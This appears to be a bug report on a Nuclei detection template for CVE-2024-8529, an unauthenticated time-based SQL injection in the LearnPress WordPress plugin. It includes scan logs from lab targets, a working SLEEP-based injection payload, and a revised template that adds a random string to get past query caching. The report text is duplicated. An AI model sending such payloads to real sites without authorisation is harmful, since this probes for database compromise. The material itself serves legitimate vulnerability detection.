Template IDs or paths
- http/cves/2024/CVE-2024-8529.yaml
Environment
- OS: Ubuntu 25.04
- Nuclei: 3.7.0
Steps To Reproduce
- VULNERABLE:
nuclei -t CVE-2024-8529.yaml -target http://wordpress-vulnerable:80
- PATCHED:
nuclei -t CVE-2024-8529.yaml -target http://wordpress-patched:80
Relevant dumped responses
root@5bc2ae94136b:/app# nuclei -t templates/CVE-2024-8529.yaml -target http://wordpress-vulnerable:80 -dresp -duc
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.7.0
projectdiscovery.io
[INF] Current nuclei version: v3.7.0 (unknown) - remove '-duc' flag to enable update checks
[INF] Current nuclei-templates version: v10.3.5 (unknown) - remove '-duc' flag to enable update checks
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 57
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[DBG] [CVE-2024-8529] Dumped HTTP response http://wordpress-vulnerable:80/wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(6)))a)
HTTP/1.1 200 OK
Connection: close
Content-Length: 2
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Allow: GET
Content-Type: application/json; charset=UTF-8
Date: Wed, 01 Apr 2026 14:03:38 GMT
Link: <http://localhost:8080/wp-json/>; rel="https://api.w.org/"
Server: Apache/2.4.66 (Debian)
Set-Cookie: lp_session_guest=g-69cd25ba773d5; expires=Fri, 03 Apr 2026 14:03:38 GMT; Max-Age=172800; path=/; HttpOnly
Vary: Origin
X-Content-Type-Options: nosniff
X-Powered-By: PHP/8.3.30
X-Robots-Tag: noindex
X-Wp-Total: 0
X-Wp-Totalpages: 0
[]
[INF] Scan completed in 1.605908144s. No results found.
root@5bc2ae94136b:/app# nuclei -t templates/CVE-2024-8529.yaml -target http://wordpress-patched:80 -dresp -duc
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.7.0
projectdiscovery.io
[INF] Current nuclei version: v3.7.0 (unknown) - remove '-duc' flag to enable update checks
[INF] Current nuclei-templates version: v10.3.5 (unknown) - remove '-duc' flag to enable update checks
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 57
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[DBG] [CVE-2024-8529] Dumped HTTP response http://wordpress-patched:80/wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(6)))a)
HTTP/1.1 200 OK
Connection: close
Content-Length: 2
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Allow: GET
Content-Type: application/json; charset=UTF-8
Date: Wed, 01 Apr 2026 14:03:55 GMT
Link: <http://localhost:8081/wp-json/>; rel="https://api.w.org/"
Server: Apache/2.4.66 (Debian)
Set-Cookie: lp_session_guest=g-69cd25cb50832; expires=Thu, 02 Apr 2026 14:03:55 GMT; Max-Age=86400; path=/; HttpOnly
Vary: Origin
X-Content-Type-Options: nosniff
X-Powered-By: PHP/8.3.30
X-Robots-Tag: noindex
X-Wp-Total: 0
X-Wp-Totalpages: 0
[]
[INF] Scan completed in 1.624597804s. No results found.
root@5bc2ae94136b:/app# tail templates/CVE-2024-8529.yaml
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "duration>=6"
- "contains(content_type, 'application/json')"
- contains_all(body, 'id\":', 'name\":')
condition: and
# digest: 4a0a004730450220020262c5fc7e591f4409a1615642c2f1ac0bc8c88e43e191bdffaa88be95434802210082f518e8b3d580faae770be8da773d1f3e8c1f76cf059332ad089f4484d63744:922c64590222798bb761d5b6d8e72950
root@5bc2ae94136b:/app#Anything else?
Two issues found while testing on LearnPress 4.2.7 (vulnerable) / 4.2.8 (patched):
-
Body matchers (contains_all) may cause false negatives — in my implementation
response body is always []. Possible that author tested on different version
where body was non-empty, but for blind SQLi body check is unreliable by design.
-
DB query cache (MySQL 5.7 in my case) causes SLEEP() to fire only on first
identical request. Suggest adding {{randstr}} to payload to bypass query cache.
id: CVE-2024-8529
info:
name: LearnPress < 4.2.7.1 - SQL Injection
author: ritikchaddha
severity: critical
description: |
The LearnPress WordPress LMS Plugin before 4.2.7.1 is vulnerable to unauthenticated SQL injection via the 'c_fields' parameter in the /wp-json/lp/v1/courses/archive-course REST API endpoint, allowing attackers to extract sensitive information from the database.
impact: |
Unauthenticated attackers can exploit SQL injection through the c_fields parameter to extract sensitive database information including user credentials, course data, and personal information from the LearnPress LMS.
remediation: |
Update the LearnPress plugin to version 4.2.7.1 or later.
reference:
- https://wpscan.com/vulnerability/6b86c089-177b-45b4-979e-4ae08e586e83/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b2671e-0db7-4ba9-b574-a0122959e8fc
- https://nvd.nist.gov/vuln/detail/CVE-2024-8529
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-8529
cwe-id: CWE-89
epss-score: 0.71031
epss-percentile: 0.98692
cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
verified: true
fofa-query: body="wp-content/plugins/learnpress"
vendor: thimpress
product: learnpress
tags: cve,cve2024,wordpress,wp-plugin,wp,learnpress,sqli,time-based-sqli,vkev,vuln
http:
- raw:
- |
@timeout: 30s
GET /wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(6)))a)/*{{randstr}}*/ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration >= 6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
condition: and
Template IDs or paths
Environment
Steps To Reproduce
nuclei -t CVE-2024-8529.yaml -target http://wordpress-vulnerable:80nuclei -t CVE-2024-8529.yaml -target http://wordpress-patched:80Relevant dumped responses
root@5bc2ae94136b:/app# nuclei -t templates/CVE-2024-8529.yaml -target http://wordpress-vulnerable:80 -dresp -duc __ _ ____ __ _______/ /__ (_) / __ \/ / / / ___/ / _ \/ / / / / / /_/ / /__/ / __/ / /_/ /_/\__,_/\___/_/\___/_/ v3.7.0 projectdiscovery.io [INF] Current nuclei version: v3.7.0 (unknown) - remove '-duc' flag to enable update checks [INF] Current nuclei-templates version: v10.3.5 (unknown) - remove '-duc' flag to enable update checks [WRN] Scan results upload to cloud is disabled. [INF] New templates added in latest release: 57 [INF] Templates loaded for current scan: 1 [INF] Executing 1 signed templates from projectdiscovery/nuclei-templates [INF] Targets loaded for current scan: 1 [DBG] [CVE-2024-8529] Dumped HTTP response http://wordpress-vulnerable:80/wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1 200 OK Connection: close Content-Length: 2 Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Allow: GET Content-Type: application/json; charset=UTF-8 Date: Wed, 01 Apr 2026 14:03:38 GMT Link: <http://localhost:8080/wp-json/>; rel="https://api.w.org/" Server: Apache/2.4.66 (Debian) Set-Cookie: lp_session_guest=g-69cd25ba773d5; expires=Fri, 03 Apr 2026 14:03:38 GMT; Max-Age=172800; path=/; HttpOnly Vary: Origin X-Content-Type-Options: nosniff X-Powered-By: PHP/8.3.30 X-Robots-Tag: noindex X-Wp-Total: 0 X-Wp-Totalpages: 0 [] [INF] Scan completed in 1.605908144s. No results found. root@5bc2ae94136b:/app# nuclei -t templates/CVE-2024-8529.yaml -target http://wordpress-patched:80 -dresp -duc __ _ ____ __ _______/ /__ (_) / __ \/ / / / ___/ / _ \/ / / / / / /_/ / /__/ / __/ / /_/ /_/\__,_/\___/_/\___/_/ v3.7.0 projectdiscovery.io [INF] Current nuclei version: v3.7.0 (unknown) - remove '-duc' flag to enable update checks [INF] Current nuclei-templates version: v10.3.5 (unknown) - remove '-duc' flag to enable update checks [WRN] Scan results upload to cloud is disabled. [INF] New templates added in latest release: 57 [INF] Templates loaded for current scan: 1 [INF] Executing 1 signed templates from projectdiscovery/nuclei-templates [INF] Targets loaded for current scan: 1 [DBG] [CVE-2024-8529] Dumped HTTP response http://wordpress-patched:80/wp-json/learnpress/v1/courses?c_fields=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1 200 OK Connection: close Content-Length: 2 Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Allow: GET Content-Type: application/json; charset=UTF-8 Date: Wed, 01 Apr 2026 14:03:55 GMT Link: <http://localhost:8081/wp-json/>; rel="https://api.w.org/" Server: Apache/2.4.66 (Debian) Set-Cookie: lp_session_guest=g-69cd25cb50832; expires=Thu, 02 Apr 2026 14:03:55 GMT; Max-Age=86400; path=/; HttpOnly Vary: Origin X-Content-Type-Options: nosniff X-Powered-By: PHP/8.3.30 X-Robots-Tag: noindex X-Wp-Total: 0 X-Wp-Totalpages: 0 [] [INF] Scan completed in 1.624597804s. No results found. root@5bc2ae94136b:/app# tail templates/CVE-2024-8529.yaml Host: {{Hostname}} matchers: - type: dsl dsl: - "duration>=6" - "contains(content_type, 'application/json')" - contains_all(body, 'id\":', 'name\":') condition: and # digest: 4a0a004730450220020262c5fc7e591f4409a1615642c2f1ac0bc8c88e43e191bdffaa88be95434802210082f518e8b3d580faae770be8da773d1f3e8c1f76cf059332ad089f4484d63744:922c64590222798bb761d5b6d8e72950 root@5bc2ae94136b:/app#Anything else?
Two issues found while testing on LearnPress 4.2.7 (vulnerable) / 4.2.8 (patched):
Body matchers (contains_all) may cause false negatives — in my implementation
response body is always []. Possible that author tested on different version
where body was non-empty, but for blind SQLi body check is unreliable by design.
DB query cache (MySQL 5.7 in my case) causes SLEEP() to fire only on first
identical request. Suggest adding {{randstr}} to payload to bypass query cache.